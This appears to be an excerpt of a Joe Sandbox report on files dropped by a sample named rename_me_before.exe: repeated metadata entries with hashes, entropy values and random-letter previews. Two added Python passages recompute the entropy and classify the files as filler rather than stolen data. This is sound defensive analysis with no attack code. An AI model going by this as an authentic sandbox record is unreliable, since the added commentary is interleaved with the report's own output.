                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
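Added worked check, not part of the Joe Sandbox report: every dropped file in this run is 1026 bytes, "ASCII text, with very long lines (1024), with CRLF line terminators", and sits at an entropy of 4.69 to 4.70 bits per byte. That number is exactly what uniform random text over the 26 uppercase letters produces (log2(26) is about 4.700), and it is far below the 7.5+ that packed or encrypted payloads show, so these are generated filler files rather than encrypted loot. The script below recomputes the "Entropy (8bit)" field over the preview copied from the entry directly above (MD5 A28F7445BB3D064C83EB9DBC98091F76; the viewer may have truncated the preview, so its exact length is not assumed), derives the largest entropy a 1024-letter-plus-CRLF file could possibly have, and checks the reported value against it. The function names and the classification thresholds are this example's own assumptions, not Joe Sandbox's.

```python
import math
from collections import Counter

# Preview text copied from the report entry above (dropped file with
# MD5 A28F7445BB3D064C83EB9DBC98091F76, Size 1026, Entropy 4.695685570184741).
# The report viewer may truncate previews, so the length is not assumed to be 1024.
PREVIEW = (
    "UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMG"
    "RRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGS"
    "KZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWH"
    "TWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCT"
    "UAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVR"
    "WXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMP"
    "VINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWU"
    "TRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTV"
    "FXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQ"
    "SMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN"
)
REPORTED_SIZE = 1026                 # 1024 letters + CR + LF, as the "File Type" line says
REPORTED_ENTROPY = 4.695685570184741  # the report's "Entropy (8bit)" value for this file


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the quantity in the report's 'Entropy (8bit)' field."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def observed_alphabet(data: bytes) -> set:
    """Set of distinct byte values present in the data."""
    return set(data)


def entropy_ceiling(n_symbols: int, alphabet_size: int, n_singletons: int) -> float:
    """Largest entropy a file can have when it consists of n_symbols bytes drawn from an
    alphabet of alphabet_size values plus n_singletons bytes that each occur exactly once
    (for these files: 1024 letters from A-Z plus one CR and one LF). The bound is reached
    when the letters are perfectly uniform."""
    n = n_symbols + n_singletons
    letters = n_symbols / n * (math.log2(alphabet_size) + math.log2(n / n_symbols))
    singletons = n_singletons / n * math.log2(n) if n_singletons else 0.0
    return letters + singletons


def classify(data: bytes) -> str:
    """Coarse triage label. The thresholds are this example's assumptions, not Joe Sandbox's."""
    k = len(observed_alphabet(data))
    if k == 0:
        return "empty"
    h = shannon_entropy(data)
    if h > 7.5:
        return "high entropy: likely packed, compressed or encrypted"
    # Uniform random text over a small alphabet sits within a few hundredths of a bit of
    # log2(k); English letters over the same alphabet sit roughly half a bit lower.
    if k <= 64 and math.log2(k) - h < 0.05:
        return f"near-uniform over a {k}-symbol alphabet: generated filler text"
    return "structured or natural text"


def consistent_with_report(preview: str, reported_size: int, reported_entropy: float) -> bool:
    """Sanity check: the preview contains only A-Z, and the reported entropy does not exceed
    what a reported_size-byte file of A-Z letters plus a trailing CRLF could possibly have.
    A reported value above the ceiling would mean the preview is not representative of
    the file (for example, a binary blob hidden after the visible text)."""
    data = preview.encode("ascii", errors="replace")
    if not data or not observed_alphabet(data) <= set(range(ord("A"), ord("Z") + 1)):
        return False
    return reported_entropy <= entropy_ceiling(reported_size - 2, 26, 2)


if __name__ == "__main__":
    data = PREVIEW.encode("ascii")
    print(f"preview entropy       : {shannon_entropy(data):.4f} bits/byte")
    print(f"log2(26)              : {math.log2(26):.4f}")
    print(f"ceiling for this file : {entropy_ceiling(REPORTED_SIZE - 2, 26, 2):.4f}")
    print(f"reported entropy      : {REPORTED_ENTROPY}")
    print(f"consistent with report: {consistent_with_report(PREVIEW, REPORTED_SIZE, REPORTED_ENTROPY)}")
    print(f"classification        : {classify(data)}")
```

The same check applies to every other 1026-byte entry in this list: all of their reported entropies fall below the ~4.71 ceiling, which is what one expects if each file really is one line of random capitals plus CRLF. The value of the check is the negative case: an entry of this shape whose reported entropy came out above the ceiling, or whose preview contained anything outside A-Z, would deserve a closer look instead of being waved through as filler.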
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                          MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                          SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                          SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                          SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                                          MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                                          SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                                          SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                                          SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
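The dropped files listed above share one shape: "ASCII text, with very long lines (1024), with CRLF line terminators", 1026 bytes, 8-bit entropy between roughly 4.687 and 4.702, and a preview made only of uppercase letters. That entropy is what a single 1024-character line of near-uniformly random A-Z plus CRLF produces (log2(26) is about 4.700, and the plug-in estimate on 1024 samples lands just below it), so the numbers are consistent with the files being filler rather than stolen data. Reading them as decoy content is an inference from the metadata, not something the report states. The following Python is an added worked example, not code from Joe Sandbox or from the analysed sample: it reproduces the report's entropy measure, compares it with the theoretical bound, and applies a heuristic for this file shape. The two sample byte strings are constructed here (seeded RNG) and are not the files from the analysis.

```python
import math
import random
from collections import Counter

# Constructed sample (not one of the report's files): 1024 uppercase letters
# followed by CRLF, matching "very long lines (1024)", CRLF terminators and
# "Size (bytes): 1026". Seeded so the run is reproducible.
_rng = random.Random(1582938)
SAMPLE_JUNK = (
    "".join(_rng.choice("ABCDEFGHIJKLMNOPQRSTUVWXYZ") for _ in range(1024)).encode("ascii")
    + b"\r\n"
)

# Constructed counter-example: a plausible credential text file, which has a
# different structure and byte distribution than the filler files.
SAMPLE_CREDS = b"URL: https://example.test/login\r\nUSER: alice\r\nPASS: hunter2\r\n"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure the report
    labels 'Entropy (8bit)'. Empty input is defined as 0.0."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def theoretical_letter_entropy() -> float:
    """Upper bound for bytes drawn uniformly from the 26 uppercase letters."""
    return math.log2(26)


def looks_like_random_letter_junk(data: bytes, tolerance: float = 0.05) -> bool:
    """Heuristic for the file shape seen in this report (assumed thresholds):
    exactly 1026 bytes, one CRLF-terminated line, body is A-Z only, and the
    8-bit entropy sits within `tolerance` of log2(26)."""
    if len(data) != 1026 or not data.endswith(b"\r\n"):
        return False
    body = data[:-2]
    # bytes.isalpha()/isupper() are ASCII-only, which is what we want here.
    if not (body.isalpha() and body.isupper()):
        return False
    return abs(shannon_entropy(data) - theoretical_letter_entropy()) < tolerance


def classify(data: bytes) -> str:
    """Small triage label: 'filler' for the random-letter shape, otherwise 'other'."""
    return "filler" if looks_like_random_letter_junk(data) else "other"


if __name__ == "__main__":
    for name, blob in (("SAMPLE_JUNK", SAMPLE_JUNK), ("SAMPLE_CREDS", SAMPLE_CREDS)):
        print(f"{name}: size={len(blob)} entropy={shannon_entropy(blob):.6f} -> {classify(blob)}")
    print(f"log2(26) = {theoretical_letter_entropy():.6f}")
```

The heuristic is deliberately narrow: it keys on the exact size and the uppercase-only body that the report's metadata shows, so it separates these filler files from the small credential text files a stealer also writes (those fail the size and character-class checks before entropy is even considered). Loosen the size check if you want to catch the same pattern at other lengths.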
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
